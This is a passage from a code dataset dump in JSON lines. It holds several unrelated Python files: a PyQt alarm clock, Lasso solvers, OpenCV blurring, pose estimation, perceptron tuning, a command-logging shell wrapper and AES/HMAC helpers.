print(prediction)\n return prediction[0]\n\n\ndef insertPrediction(data):\n engine = create_engine(DATABASE_URL)\n conn = engine.connect()\n meta = MetaData()\n meta.reflect(bind=engine)\n predictions = meta.tables['predictions']\n conn.execute(insert(predictions,data))\n","sub_path":"Scripts/Predictors/Predictor.py","file_name":"Predictor.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"515658719","text":"import sys\n\nfrom PyQt5 import (\n uic, \n QtCore\n)\n\nfrom PyQt5.QtCore import (\n QTimer, \n QTime,\n QUrl\n)\n\nfrom PyQt5.QtWidgets import (\n QApplication, \n QWidget, \n QMainWindow, \n QLCDNumber,\n QMessageBox, \n QTimeEdit, \n QHBoxLayout,\n QDialog,\n QListWidgetItem\n)\n\nfrom PyQt5.QtMultimedia import (\n QMediaPlayer,\n QMediaContent,\n QMediaPlaylist\n)\n\nfrom digital_clock import DigitalClock\nfrom new_alarm_clock_dialog import NewAlarmClockDialog\nfrom alarm_clock_item_widget import AlarmClockItemWidget\nfrom alarm_clock_item import AlarmClockItem\n\nclass MyWidget(QMainWindow):\n def __init__(self):\n super().__init__()\n\n uic.loadUi('ui/alarm_clock_form.ui', self)\n self.initUI()\n\n self.alarm_clock_list = []\n\n self.player = QMediaPlayer()\n self.playlist = QMediaPlaylist()\n self.playlist.setPlaybackMode(QMediaPlaylist.CurrentItemInLoop)\n self.player.setPlaylist(self.playlist)\n\n def initUI(self):\n self.digital_clock = DigitalClock(self.clockWidget)\n self.digital_clock.time_tick.connect(self.time_tick)\n\n clock_widget_layout = QHBoxLayout()\n clock_widget_layout.addWidget(self.digital_clock)\n self.clockWidget.setLayout(clock_widget_layout)\n\n self.addAlarmClockButton.clicked.connect(self.add_alarm_clock)\n\n def closeEvent(self, event):\n\n reply = QMessageBox.question(self, 'Выход',\n \"Вы уверены что хотите выйти? Будильники перестанут работать\", \n QMessageBox.Yes | QMessageBox.No, \n QMessageBox.No)\n\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n def add_alarm_clock(self):\n dialog = NewAlarmClockDialog()\n dialog_result = dialog.exec_()\n\n if (dialog_result == QDialog.Accepted):\n widget_item = QListWidgetItem(self.listWidget);\n\n alarm_clock_item = AlarmClockItem(dialog.nameLineEdit.text(), \n dialog.timeEdit.time(),\n dialog.filePathLineEdit.text())\n alarm_clock_item.alarm.connect(self.alarm)\n self.alarm_clock_list.append(alarm_clock_item)\n\n alarm_clock_item_widget = AlarmClockItemWidget(alarm_clock_item, widget_item, self)\n alarm_clock_item_widget.alarm_clock_remove.connect(self.alarm_clock_remove)\n \n widget_item.setSizeHint(alarm_clock_item_widget.sizeHint());\n self.listWidget.setItemWidget(widget_item, alarm_clock_item_widget);\n \n dialog.deleteLater()\n\n def alarm_clock_remove(self):\n self.listWidget.takeItem(self.listWidget.row(self.sender().list_widget_item))\n self.alarm_clock_list.remove(self.sender().alarm_clock)\n\n def time_tick(self):\n for alarm_clock in self.alarm_clock_list:\n if alarm_clock.is_active:\n alarm_clock.tick()\n\n def alarm(self):\n alarm_clock = self.sender()\n\n self.play_sound(alarm_clock.alarm_sound)\n\n QMessageBox.information(self, 'Будильник',\n 'Будильник \"' + alarm_clock.title + '\"', \n QMessageBox.Ok)\n alarm_clock.is_alarm = False\n self.stop_sound()\n\n def play_sound(self, sound):\n if len(sound):\n self.player.stop()\n self.playlist.clear()\n\n media_content = QMediaContent(QUrl.fromLocalFile(sound))\n self.playlist.addMedia(media_content)\n self.player.play()\n\n def stop_sound(self):\n self.player.stop()\n\napp = QApplication(sys.argv)\nex = MyWidget()\nex.show()\nsys.exit(app.exec_())\n","sub_path":"alarm_clock_test.py","file_name":"alarm_clock_test.py","file_ext":"py","file_size_in_byte":3884,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"13546288","text":"import numpy as np\nimport numpy.linalg as LA\n\nPG = \"PG\"\nAPG = \"APG\"\n\nclass Lasso:\n def __init__(self, mu, A, lam, method=APG, tmax=100):\n self.w = np.matrix([[3, -1]])\n self.mu = mu\n self.A = A\n self.lam = lam\n self.eta = 1.0 / float(max(LA.eig(2 * self.A)[0]))\n self.history = [self.w] # sequence of J(w)\n self.tmax = tmax\n if method == APG:\n self.prevW = self.w\n self.s = 0\n self.update = self.updateAPG\n else:\n self.update = self.updatePG\n\n\n def __phi(self, w):\n d = w - self.mu\n return (d * self.A * d.T).tolist()[0][0]\n\n def lossFunction(self, w):\n return self.__phi(w) + self.lam * np.abs(w).sum()\n\n def __phiPrime(self, w):\n d = w - self.mu\n return 2 * d * self.A\n\n def prox_eta(self, mu):\n etalambda = self.eta * self.lam\n return np.matrix([mui - etalambda if mui > etalambda else 0 if - etalambda < mui and mui < etalambda else mui + etalambda for mui in mu.A1.tolist()])\n\n def updatePG(self):\n self.w = self.prox_eta(self.w - self.eta * self.__phiPrime(self.w))\n\n def updateAPG(self):\n prevW = self.w\n s = self.s\n self.s = 0.5 * (1 + np.sqrt(1 + 4 * self.s ** 2))\n v = self.w + (s - 1) * (self.w - self.prevW) / self.s\n self.w = self.prox_eta(v - self.eta * self.__phiPrime(v))\n self.prevW = prevW\n\n def solve(self):\n for _ in range(self.tmax):\n self.update()\n self.history.append(self.w)\n","sub_path":"src/Lasso.py","file_name":"Lasso.py","file_ext":"py","file_size_in_byte":1557,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"352062716","text":"# (1) Import Classes to create two separate types of cars\n\n# from car import Car, ElectricCar\n# import electric_car\n# import car\nfrom car import Car\nfrom electric_car import ElectricCar\n\nmy_beetle = Car('volkswagen', 'beetle', 2016)\nmy_tesla = ElectricCar('tesla', 'roadster', 2016)\n\ncars = [my_beetle, my_tesla]\n\nfor car in cars:\n\tprint(car.get_descriptive_name())","sub_path":"book_python_crash_course/ch09/my_cars.py","file_name":"my_cars.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"455141594","text":"import numpy as np\nimport argparse\nimport cv2\n\n##ap = argparse.ArgumentParser()\n##ap.add_argument(\"-i\", \"--image\", required = True,\n##\thelp = \"path to the image\")\n##args = vars(ap.parse_args())\nimage = cv2.imread(\"luffy.jpg\") #use always the same image in folder\ncv2.imshow(\"Orginal\", image)\n\nblurred = np.hstack([\n\tcv2.blur(image, (3, 3)),\n\tcv2.blur(image, (5, 5)),\n\tcv2.blur(image, (7, 7))])\n\ncv2.imshow(\"Averaged\", blurred)\n\nblurred = np.hstack([\n\tcv2.GaussianBlur(image, (3, 3), 0),\n\tcv2.GaussianBlur(image, (5, 5), 0),\n\tcv2.GaussianBlur(image, (7, 7), 0)])\n\ncv2.imshow(\"Gaussian\", blurred)\n\nblurred = np.hstack([\n\tcv2.medianBlur(image, 3),\n\tcv2.medianBlur(image, 5),\n\tcv2.medianBlur(image, 7)])\n\ncv2.imshow(\"medianBlur\", blurred)\n\nblurred = np.hstack([\n\tcv2.bilateralFilter(image, 5, 21, 21),\n\tcv2.bilateralFilter(image, 7, 31, 31),\n\tcv2.bilateralFilter(image, 9, 41, 41)])\n\ncv2.imshow(\"bilateralFilter\", blurred)\ncv2.waitKey(0)","sub_path":"blurring.py","file_name":"blurring.py","file_ext":"py","file_size_in_byte":933,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"135365641","text":"import numpy as np\n\ndef recoverPose(pts1_, pts2_, E, optimize = False):\n \n \"\"\"\n given a set of points and essential matrix, estimate pose\n \"\"\"\n \n if (pts1_.shape[1] == 2) or (pts1_.shape[1] == 2): \n pts1_,pts2_ = homo(pts1_),homo(pts2_)\n\n ### estimate all 4 mathematically possible poses###\n poses = estimatePoses(E)\n\n max_positiveZ, correctPose = 0, None\n \n ## choose the only physically possible pose\n for pose in poses: \n ## get 3D points ##\n pts3D = LinearTriangulation(pts1_, pts2_, pose) \n \n # if optimize:\n ## perform non linear optimization\n \n ### get n positive depths of the pose###\n n_positiveZ = ChieralityCheck(pts3D, pose)\n ## choose the pose with most positive depth results.\n if n_positiveZ >= max_positiveZ :\n max_positiveZ = n_positiveZ\n correctPose = pose\n\n return correctPose\n\ndef LinearTriangulation(pts1, pts2, pose):\n \n \"\"\"\n To perform linear triangulation,\n np.cross(x,P)X = 0 and np.cross(x',P')X = 0 relationships need to be satisfied.\n X : 3D point \n x : 2d image point \n P : projection matrix\n\n Reference: http://www.cs.cmu.edu/~16385/s17/Slides/11.4_Triangulation.pdf\n \"\"\" \n # Following the general parameterization of dependant images, \n #Pose1 is a reference frame, Pose2 is our estimated pose\n Pose1, Pose2 = np.eye(3,4), pose\n pts3D = []\n for x1, x2 in zip(pts1, pts2): \n x1P1 = cross_1Dx4D(x1,Pose1)\n x2P2 = cross_1Dx4D(x2,Pose2)\n A = np.vstack((x1P1, x2P2))\n\n _,_,Vt = np.linalg.svd(A)\n X = Vt[-1]\n X = X/X[-1]\n pts3D.append(X[:3]) \n return np.array(pts3D)\n\ndef ChieralityCheck(pts3D, pose):\n r3 = pose[:,2]\n c = pose[:,2]\n# r3 = pose[2, :3]\n# c = pose[:, 3]\n n_positiveZ = 0\n for X in pts3D:\n # cheirality condition\n if (r3 @ (X - c)) > 0:\n n_positiveZ += 1\n return n_positiveZ\n\ndef homo(pts):\n return np.column_stack((pts, np.ones(len(pts)).reshape(-1,1)))\n\ndef cross_1Dx4D(x,P):\n \"\"\"\n to find cross product between a 1D vector and 4D projection matrix\n \"\"\"\n x_3x3 = np.array([[0, -x[2], x[1]],\n [x[2], 0, -x[0]],\n [-x[1], x[0], 0]])\n return x_3x3 @ P\n\n\ndef estimatePoses(E):\n U, _, Vt = np.linalg.svd(E, full_matrices=True)\n W = np.array([\n [0, -1, 0],\n [1, 0, 0],\n [0, 0, 1]])\n\n R12 = U @ W @ Vt\n R34 = U @ W.T @ Vt\n C = U[:, 2]\n \n poses = np.array([np.column_stack((R12, C)),\n np.column_stack((R12, -C)),\n np.column_stack((R34, C)),\n np.column_stack((R34, -C))])\n\n poses = signcheck(poses)\n \n return poses\n\ndef signcheck(poses):\n poses_ = []\n for pose in poses:\n r = pose[:, :3]\n if np.linalg.det(r) <0:\n poses_.append(-pose)\n else:\n poses_.append(pose)\n return poses_\n","sub_path":"Code/misc/.ipynb_checkpoints/PoseEstimation-checkpoint.py","file_name":"PoseEstimation-checkpoint.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"212847948","text":"from boosting_decision_making import feature_encoder\n\n\nclass FeatureEncodingConfigurer:\n\n def __init__(self):\n self.feature_dict_with_encodings = {}\n\n def initialize_encoders_from_config(self, config_str):\n self.feature_dict_with_encodings = {}\n for str_part in config_str.split(\";\"):\n if not str_part.strip():\n continue\n config_parts = str_part.split(\"|\")\n feature_name = int(config_parts[0])\n field_name = config_parts[1]\n encoding_type = config_parts[2]\n max_features = int(config_parts[3])\n ngram_max = int(config_parts[4])\n self.feature_dict_with_encodings[feature_name] = feature_encoder.FeatureEncoder(\n field_name=field_name, encoding_type=encoding_type,\n max_features=max_features, ngram_max=ngram_max)\n\n def initialize_encoders_from_objects(self, feature_info):\n self.feature_dict_with_encodings = {}\n for feature in feature_info:\n _feature_encoder = feature_encoder.FeatureEncoder()\n self.feature_dict_with_encodings[feature_info] = _feature_encoder.load_from_feature_info(\n feature_info[feature])\n\n def prepare_encoders(self, data):\n for feature in self.feature_dict_with_encodings:\n self.feature_dict_with_encodings[feature].fit(data)\n","sub_path":"boosting_decision_making/feature_encoding_configurer.py","file_name":"feature_encoding_configurer.py","file_ext":"py","file_size_in_byte":1383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"426953128","text":"\"\"\"\r\nThis code finds good parameters for achieving excellent achievement on\r\nperceptrons (one vs all)\r\n\"\"\"\r\n\r\nif __name__ == '__main__':\r\n import numpy as np\r\n import os\r\n import matplotlib.pyplot as plt\r\n from read_iris import read_iris_dataset\r\n from perceptron_one_vs_all import perceptron_one_vs_all\r\n import json\r\n from k_fold import k_fold_cross_validation\r\n from sklearn import preprocessing\r\n import sys\r\n import warnings\r\n\r\n order = '2'\r\n cut_error = None\r\n max_epochs = 200\r\n K_fold = 10\r\n\r\n # write in file\r\n file = open('find_good_perceptrons.txt', 'w')\r\n ratio_of_train_set = 0.7\r\n ratio_of_valid_set = 0.15\r\n ratio_of_test_set = 0.15\r\n min_test_error = 10000.0\r\n best_learning = np.inf\r\n best_random_state=np.inf\r\n\r\n for random_state in range(0, 7):\r\n\r\n # read train and test from iris dataset\r\n trainX, validX, testX, trainY, validY, testY = read_iris_dataset(rand_state=random_state,\r\n train_ratio=ratio_of_train_set,\r\n valid_ratio=ratio_of_valid_set,\r\n test_ratio=1 - (ratio_of_train_set + ratio_of_valid_set),\r\n order=order)\r\n # print(trainX, testX, trainY, testY)\r\n # standard scaler\r\n scaler = preprocessing.StandardScaler().fit(trainX)\r\n trainX = scaler.transform(trainX)\r\n validX = scaler.transform(validX)\r\n testX = scaler.transform(testX)\r\n\r\n # map labels name\r\n map = {'Iris-setosa': 1, 'Iris-versicolor': 2, 'Iris-virginica': 3}\r\n temp = np.zeros(trainY.shape, dtype=int)\r\n for idx, label in enumerate(trainY):\r\n temp[idx] = map[trainY[idx][0]]\r\n trainY = np.copy(temp)\r\n\r\n temp = np.zeros(validY.shape, dtype=int)\r\n for idx, label in enumerate(validY):\r\n temp[idx] = map[validY[idx][0]]\r\n validY = np.copy(temp)\r\n\r\n temp = np.zeros(testY.shape, dtype=int)\r\n for idx, label in enumerate(testY):\r\n temp[idx] = map[testY[idx][0]]\r\n testY = np.copy(temp)\r\n\r\n\r\n for learning_rate in np.arange(0.001, 0.03, 0.003):\r\n\r\n # train perceptrons (all vs on)\r\n units = perceptron_one_vs_all(number_classes=3, learning_rate=learning_rate, max_epoch=max_epochs,\r\n cut_error=cut_error)\r\n k_fold_units = perceptron_one_vs_all(number_classes=3, learning_rate=learning_rate, max_epoch=max_epochs,\r\n cut_error=cut_error)\r\n\r\n # train perceptrons\r\n units.fit(X=trainX, y=trainY, validX=validX, validY=validY,\r\n classes_name=['Iris-setosa', 'Iris-versicolor', 'Iris-virginica'],\r\n rand_state=random_state, plotting=False, write_in_file=False)\r\n\r\n # calculate K-Fold Error\r\n train_arguments = {'classes_name': ['Iris-setosa', 'Iris-versicolor', 'Iris-virginica'],\r\n 'rand_state': random_state, 'plotting': False, 'write_in_file': False}\r\n\r\n k_fold_error = k_fold_cross_validation(learner=k_fold_units, argument_of_learner=train_arguments,\r\n X=np.copy(trainX), y=np.copy(trainY), k=K_fold)\r\n\r\n file.write('\\nVV======================VVV=======================VV')\r\n print('===================================================V')\r\n file.write('\\nlearning_rate: {}'.format(learning_rate))\r\n print('learning_rate: {}'.format(learning_rate))\r\n file.write('\\nrandom state: {}'.format(random_state))\r\n print('random state: {}'.format(random_state))\r\n file.write('\\nratio of train set: {}'.format(ratio_of_train_set))\r\n print('ratio of train set: {}'.format(ratio_of_train_set))\r\n\r\n # error of perceptrons(one vs all) for training set\r\n pred = []\r\n for x in trainX:\r\n prediction = units.predict(x)\r\n # print(prediction)\r\n pred.append(prediction)\r\n\r\n train_error = 0\r\n for _ in range(0, len(pred)):\r\n if pred[_] != trainY[_]:\r\n train_error += 1\r\n\r\n file.write('\\n{0}-fold-cross-validation error is: {1}'.format(K_fold, k_fold_error))\r\n print('{0}-fold-cross-validation error is: {1}'.format(K_fold, k_fold_error))\r\n file.write('\\nTrain Error(Ordinary Error, not k-fold)= {0}'.format(train_error / len(pred)))\r\n print('Train Error(Ordinary Error, not k-fold)= {0}'.format(train_error / len(pred)))\r\n\r\n # error of perceptrons(one vs all) for test set\r\n pred = []\r\n for x in testX:\r\n prediction = units.predict(x)\r\n pred.append(prediction)\r\n\r\n test_error = 0\r\n for _ in range(0, len(pred)):\r\n if pred[_] != testY[_]:\r\n test_error += 1\r\n\r\n file.write('\\nTest Error= {0}'.format(test_error / len(pred)))\r\n print('Test Error= {0}'.format(test_error / len(pred)))\r\n\r\n if min_test_error > (test_error / len(pred)):\r\n min_test_error = test_error / len(pred)\r\n best_random_state = random_state\r\n best_learning = learning_rate\r\n\r\n file.write('\\n===================================================^\\n')\r\n print('===================================================^')\r\n\r\n print('\\n********************************')\r\n file.write('\\n********************************')\r\n print('min test error: {}'.format(min_test_error))\r\n file.write('\\nmin test error: {}'.format(min_test_error))\r\n print('best learning rate: {}'.format(best_learning))\r\n file.write('\\nbest learning rate: {}'.format(best_learning))\r\n print('best random state: {}'.format(best_random_state))\r\n file.write('\\nbest random state: {}'.format(best_random_state))\r\n\r\n file.close()","sub_path":"Assignment 1/part1-classification/best_perceptron_one_vs_all.py","file_name":"best_perceptron_one_vs_all.py","file_ext":"py","file_size_in_byte":6259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"343726463","text":"\n\nfrom xai.brain.wordbase.nouns._solvent import _SOLVENT\n\n#calss header\nclass _SOLVENTS(_SOLVENT, ):\n\tdef __init__(self,): \n\t\t_SOLVENT.__init__(self)\n\t\tself.name = \"SOLVENTS\"\n\t\tself.specie = 'nouns'\n\t\tself.basic = \"solvent\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/nouns/_solvents.py","file_name":"_solvents.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"539309324","text":"#!/usr/bin/env python3\n# shell wrapper for superior logging\n# logs as CSV with time,hostname,network:ip,who,command.\n# requires Python 3+\n#\n# 2020 - Douglas Berdeaux\nimport readline\nimport os # for the commands, of course. These will be passed ot the shell.\nimport subprocess # for piping commands\nimport sys # for exit\nimport re # regexps\nimport ifaddr # NIC info\nimport socket # for HOSTNAME\nimport getpass # for logging the username\nimport datetime # for logging the datetime\n\nADAPTERS = ifaddr.get_adapters() # get network device info\nNET_DEV = \"\" # store the network device\nHOSTNAME = socket.gethostname() # hostname for logging\nUID = getpass.getuser()\nREDIRECTION_PIPE = '_'\nVERSION=\"v0.4.17.0\"\nLOG_DAY=datetime.datetime.today().strftime('%Y-%m-%d')\nLOG_FILENAME = os.path.expanduser(\"~\")+\"/.dps/\"+LOG_DAY+\"_dps_log.csv\"\nPATHS=os.getenv('PATH').split(\":\")\n\n# Set up the log file directory:\nif not os.path.exists(os.path.join(os.path.expanduser(\"~\"),\".dps\")):\n os.mkdir(os.path.join(os.path.expanduser(\"~\"),\".dps\"))\n# Set up the log file itself:\nif not os.path.exists(LOG_FILENAME):\n with open(LOG_FILENAME,'a') as log_file:\n log_file.write(\"When,Host,Network,Who,Where,What\\n\")\n# Get the adapter and IP address:\n#for adapter in ADAPTERS:\n #if re.match(\"^e..[0-9]+\",adapter.nice_name):\n #NET_DEV = adapter.nice_name+\":\"+adapter.ips[0].ip\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nreadline.parse_and_bind('tab: complete')\nreadline.parse_and_bind('set editing-mode vi')\n\ndef log_cmd(cmd): # logging a command:\n with open(LOG_FILENAME,'a') as log_file:\n log_file.write(str(datetime.datetime.now())+\",\"+HOSTNAME+\",\"+str(NET_DEV)+\",\"+UID+\",\"+os.getcwd()+\",\"+cmd+\"\\n\")\n return 0\n\ndef run_cmd(cmd):\n\n cmd_delta = cmd\n cmd_delta = re.sub(\"~\",os.path.expanduser(\"~\"),cmd_delta)\n cmd_delta = re.sub(\"^\\s+\",\"\",cmd_delta) # remove any prepended spaces\n log_cmd(cmd_delta) # first, log the command.\n\n # Handle built-in commands:\n if (cmd_delta == \"exit\" or cmd_delta == \"quit\"):\n sys.exit()\n return 0\n elif(cmd_delta==\"help\"):\n print(\"Help: ... \")\n elif(cmd_delta==\"version\"):\n print(bcolors.OKGREEN+VERSION+bcolors.ENDC)\n elif(re.match(\"^ls\",cmd_delta)):\n cmd_delta = re.sub(\"^ls\",\"ls --color=auto\",cmd)\n subprocess.call([\"/bin/bash\", \"--init-file\",\"/root/.bashrc\", \"-c\", cmd_delta])\n elif(re.match(\"^cd\",cmd_delta)):\n dir = re.sub('^cd\\s+','',cmd_delta) # take off the path\n dir = re.sub('\\s+$','',dir) # remove trailing spaces\n if (re.match(\"^cd(\\s+)?\",dir)): # go home\n dir = os.path.expanduser(\"~\")\n if (dir==\"\"):\n dir=os.path.expanduser(\"~\")\n if os.path.isdir(dir): # does it even exist?\n os.chdir(dir) # goto path\n else:\n print(\"PATH: \"+bcolors.FAIL+'\"'+dir+'\"'+bcolors.ENDC+\" does not exist.\")\n else:\n subprocess.call([\"/bin/bash\", \"--init-file\",\"/root/.bashrc\", \"-c\", cmd_delta])\n shell() # or else return to shell\n\ndef list_folder(path):\n \"\"\"\n Lists folder contents\n \"\"\"\n # starts with \"/\"\n if path.startswith(os.path.sep):\n # absolute path\n basedir = os.path.dirname(path)\n contents = os.listdir(basedir)\n # add back the parent\n contents = [os.path.join(basedir, d) for d in contents]\n else:\n # absolute (home) path:\n if path.startswith(\"~/\"):\n contents = os.listdir(os.path.expanduser(\"~/\"))\n else:\n # This could be a command so try paths:\n # TODO get environment $PATH's and break them up testing each one:\n contents=os.listdir(os.curdir)\n for path_entry in PATHS:\n try: # just learnt my first try/catch in Python - woohoo! :D\n contents+=os.listdir(path_entry)\n except:\n pass\n return contents\n\n\ndef completer(text, state):\n \"\"\"\n Our custom completer function\n \"\"\"\n options = [x for x in list_folder(text) if x.startswith(text)]\n return options[state]\n\nreadline.set_completer(completer)\nreadline.parse_and_bind('tab: complete')\nreadline.set_completer_delims('~ \\t\\n`!@#$%^&*()-=+[{]}\\\\|;:\\'\",<>?')\n\ndef shell():\n last_string = input(UID+bcolors.BOLD+\"@\"+bcolors.ENDC+HOSTNAME+bcolors.BOLD+\"[\"+bcolors.ENDC+os.getcwd()+bcolors.BOLD+\"]\"+\">> \"+bcolors.ENDC)\n run_cmd(last_string)\nprint(bcolors.BOLD+\n\"\"\"\n *** Welcome to the Demon Pentest Shell\n *** Type exit to return to standard shell\n\"\"\"\n+bcolors.ENDC)\nshell() # start the app\n","sub_path":"dps.py","file_name":"dps.py","file_ext":"py","file_size_in_byte":4722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"123777078","text":"# -*- coding: utf-8 -*-\n#########\n#Copyright (C) 2014 Mark Spurgeon \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n#########\nimport os\nfrom PyQt4.QtGui import QIcon\nimages = [\n\t\"jpg\",\n\t\"JPG\",\n\t\"png\",\n\t\"svg\"\n]\nvideos = [\n\t\"mp4\",\t\n\t\"avi\"\n]\nsounds = [\n\t\"mp3\",\n\t\"wav\"\n]\nclass getFiles():\n\tdef __init__(self):\n\t\tself.directory=os.getenv(\"HOME\")#varies\n\t\tself.default=os.getenv(\"HOME\")#Doesn't vary\n\tdef all(self):\n\t\tall=[]\n\t\tfor f in os.listdir(self.directory):\n\t\t\tif f.startswith(\".\"):\n\t\t\t\tf=None\n\t\t\telif f.endswith(\"~\"):\n\t\t\t\tf=None\n\t\t\tif f!=None:\n\t\t\t\tdict={}\n\t\t\t\tdict[\"name\"]=f\n\t\t\t\twhole_f=os.path.join(self.directory,f)\n\t\t\t\tif os.path.exists(whole_f):\n\t\t\t\t\tif os.path.isdir(whole_f):\n\t\t\t\t\t\tdict[\"type\"]=\"directory\"\n\t\t\t\t\telif os.path.isfile(whole_f):\n\t\t\t\t\t\tdict[\"type\"]=\"file\"\n\t\t\t\t\tdict[\"whole_path\"]=str(whole_f)\n\t\t\t\t\tall.append(dict)\n\t\t\t\telse:print(\"Path doesn't exist\")\n\t\treturn all\n\t\t#return [{\"type\":\"folder\", \"name\":\"name\", \"whole_path\":\"/home/usr/folder\"}, ..]\ndef getFileIcon(name):\n\t#extension\n\text=name.split('.')[-1:][0]\n\ticon=QIcon.fromTheme(name)\n\tif not icon.isNull():\n\t\treturn icon\t\n\telif ext in images:\t\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(name)\n\t\t'''\n\telif ext in images:\t\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(\"/usr/share/duck-launcher/icons/files/file-picture.svg\")\n\t\t'''\n\telif ext in videos:\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(\"/usr/share/duck-launcher/icons/files/file-video.svg\")#will be video file icon\n\telif ext in sounds:\n\t\tif os.path.isfile(name):\n\t\t\treturn QIcon(\"/usr/share/duck-launcher/icons/files/file-sound.svg\")#will be sound file icon\n\telse:\n\t\treturn QIcon(\"/usr/share/duck-launcher/icons/file.svg\")\nif __name__==\"__main__\":\n\tf =getFiles()\n\tf.directory=\"/home/mark\"\n\tf.all()\n","sub_path":"duck_launcher/Files.py","file_name":"Files.py","file_ext":"py","file_size_in_byte":2377,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"502436843","text":"# Python imports\r\nimport hashlib\r\nimport hmac\r\nimport os\r\n\r\n# Third-party imports\r\nfrom Crypto.Cipher import AES\r\n\r\n\r\ndef hash_string(\r\n k: bytes,\r\n e: str,\r\n) -> bytes:\r\n \"\"\"Hash a string using SHA-256.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: str\r\n :returns: The SHA-256 hash of the input string\r\n :rtype: bytes\r\n \"\"\"\r\n return hmac.new(k, e.encode('utf-8'), hashlib.sha256).digest()\r\n\r\n\r\ndef hash_int(\r\n k: bytes,\r\n e: int,\r\n) -> bytes:\r\n \"\"\"Hash an integer using SHA-256.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: int\r\n :returns: The SHA-256 hash of the input integer\r\n :rtype: bytes\r\n \"\"\"\r\n return hash_string(k, str(e))\r\n\r\n\r\ndef hash_bytes(\r\n k: bytes,\r\n e: bytes,\r\n) -> bytes:\r\n \"\"\"Hash bytes using SHA-256.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: bytes\r\n :returns: The SHA-256 hash of the input bytes\r\n :rtype: bytes\r\n \"\"\"\r\n return hmac.new(k, e, hashlib.sha256).digest()\r\n\r\n\r\ndef hash_string_to_int(\r\n k: bytes,\r\n e: str,\r\n) -> int:\r\n \"\"\"Hash a string using SHA-256 and convert the result to an integer.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: str\r\n :returns: An integer representation of the SHA-256 hash of the input string\r\n :rtype: int\r\n \"\"\"\r\n return int.from_bytes(hash_string(k, e), 'big')\r\n\r\n\r\ndef encrypt(\r\n key: bytes,\r\n plain_text: str,\r\n) -> bytes:\r\n \"\"\"Encrypts data using AES in CBC mode.\r\n\r\n :param key: The encryption key\r\n :type key: bytes\r\n :param plain_text: The data to encrypt\r\n :type plain_text: str\r\n :returns: The encryption of the raw data\r\n :rtype: bytes\r\n \"\"\"\r\n block_size = 16\r\n plain_text = _pad(plain_text, block_size)\r\n iv = os.urandom(block_size)\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n cipher_text = cipher.encrypt(plain_text.encode())\r\n return iv + cipher_text\r\n\r\n\r\ndef decrypt(\r\n key: bytes,\r\n cipher_text: bytes,\r\n) -> str:\r\n \"\"\"Decrypts cipher text using AES in CBC mode.\r\n\r\n :param key: The decryption key\r\n :type key: bytes\r\n :param cipher_text: The cipher text to decrypt\r\n :type cipher_text: bytes\r\n :returns: The decryption of the cipher text\r\n :rtype: str\r\n \"\"\"\r\n block_size = 16\r\n iv = cipher_text[:block_size]\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plain_text = cipher.decrypt(cipher_text[block_size:]).decode('utf-8')\r\n return _unpad(plain_text)\r\n\r\n\r\ndef _pad(\r\n s: str,\r\n bs: int,\r\n) -> str:\r\n \"\"\"Pads a string so its length is a multiple of a specified block size.\r\n\r\n :param s: The string that is to be padded\r\n :type s: str\r\n :param bs: The block size\r\n :type bs: int\r\n :returns: The initial string, padded to have a length that is a multiple of the specified block size\r\n :rtype: str\r\n \"\"\"\r\n number_of_bytes_to_pad = bs - len(s) % bs\r\n ascii_string = chr(number_of_bytes_to_pad)\r\n padding_str = number_of_bytes_to_pad * ascii_string\r\n return s + padding_str\r\n\r\n\r\ndef _unpad(\r\n s: str,\r\n) -> str:\r\n \"\"\"Unpads a string that was previously padded by _pad().\r\n\r\n :param s: The string to unpad\r\n :type s: bytes\r\n :returns: The unpadded string\r\n :rtype: str\r\n \"\"\"\r\n last_character = s[len(s) - 1:]\r\n bytes_to_remove = ord(last_character)\r\n return 